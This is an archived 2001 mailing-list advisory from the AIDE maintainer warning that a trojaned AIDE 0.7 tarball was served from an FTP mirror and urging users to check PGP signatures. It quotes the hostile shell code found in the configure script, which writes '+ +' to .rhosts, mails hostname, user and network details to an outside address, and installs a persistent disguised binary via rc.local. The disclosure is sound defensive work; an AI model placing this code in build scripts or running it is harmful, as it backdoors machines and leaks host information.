It has come my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide The offending binary has been removed. Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide. The trojaned distribution contains the following script embedded in the configure script. As you can see it tries to add "+ +" to roots .rhosts and sends information about your host to l4m0rat_private # checking if we are root or not if [ `whoami` == "root" ];then root_user=1 else root_user=0 fi And later on: if [ $root_user != "1" ];then echo "+ +" > ~/.rhosts echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig > >/tmp/jea mail l4m0rat_private < /tmp/jea rm -rf /tmp/jea else if [ `uname -s` != Linux ];then echo "" else mv -f .xinitrc /bin/lpr echo "# printing status monitor" >> /etc/rc.d/rc.local echo "/bin/lpr &" >> /etc/rc.d/rc.local hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea mail l4m0rat_private < /tmp/jea /bin/lpr & rm -rf /tmp/jea fi fi Rami Lehti -- AIDE - Advanced Intrusion Detection Environment Check http://www.cs.tut.fi/~rammer/aide.html ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 09:36:02 PDT